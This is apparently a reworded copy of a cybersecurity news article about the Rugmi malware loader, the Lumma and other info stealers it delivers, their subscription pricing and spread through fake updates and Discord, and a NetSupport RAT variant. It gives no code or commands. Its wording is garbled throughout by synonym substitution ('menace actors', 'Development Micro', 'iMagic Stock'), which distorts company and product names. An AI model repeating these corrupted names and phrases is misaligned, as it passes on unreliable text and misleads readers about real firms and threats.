A brand new malware loader is being utilized by menace actors to ship a variety of info stealers equivalent to Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity agency ESET is monitoring the trojan underneath the identify Win/TrojanDownloader.Rugmi.
“This malware is a loader with three sorts of elements: a downloader that downloads an encrypted payload, a loader that runs the payload from inner sources, and one other loader that runs the payload from an exterior file on the disk,” the corporate mentioned in its Menace Report H2 2023.
Telemetry knowledge gathered by the corporate exhibits that detections for the Rugmi loader spiked in October and November 2023, surging from single digit each day numbers to lots of per day.
From USER to ADMIN: Study How Hackers Achieve Full Management
Uncover the key techniques hackers use to change into admins, the way to detect and block it earlier than it is too late. Register for our webinar immediately.
Stealer malware is usually bought underneath a malware-as-a-service (MaaS) mannequin to different menace actors on a subscription foundation. Lumma Stealer, for example, is marketed in underground boards for $250 a month. The most costly plan prices $20,000, but it surely additionally provides the shoppers entry to the supply code and the appropriate to promote it.
There may be proof to recommend that the codebase related to Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Moreover repeatedly adapting its techniques to evade detection, the off-the-shelf software is distributed by means of a number of strategies starting from malvertising to faux browser updates to cracked installations of common software program equivalent to VLC media participant and OpenAI ChatGPT.
One other method considerations using Discord’s content material supply community (CDN) to host and propagate the malware, as revealed by Development Micro in October 2023.
This entails leveraging a mix of random and compromised Discord accounts to ship direct messages to potential targets, providing them $10 or a Discord Nitro subscription in alternate for his or her help on a venture.
Customers who comply with the supply are then urged to obtain an executable file hosted on Discord CDN that masquerades as iMagic Stock however, in actuality, accommodates the Lumma Stealer payload.
“Prepared-made malware options contribute to the proliferation of malicious campaigns as a result of they make the malware obtainable even to probably much less technically expert menace actors,” ESET mentioned.
“Providing a broader vary of capabilities then serves to render Lumma Stealer much more enticing as a product.”
The disclosures come as McAfee Labs disclosed a brand new variant of NetSupport RAT, which emerged from its reputable progenitor NetSupport Supervisor and has since been put to make use of by preliminary entry brokers to assemble info and carry out extra actions on victims of curiosity.
“The an infection begins with obfuscated JavaScript recordsdata, serving because the preliminary level of entry for the malware,” McAfee mentioned, including it highlights the “evolving techniques employed by cybercriminals.”
The execution of the JavaScript file advances the assault chain by operating PowerShell instructions to retrieve the distant management and stealer malware from an actor-controlled server. The marketing campaign’s main targets embrace the U.S. and Canada.
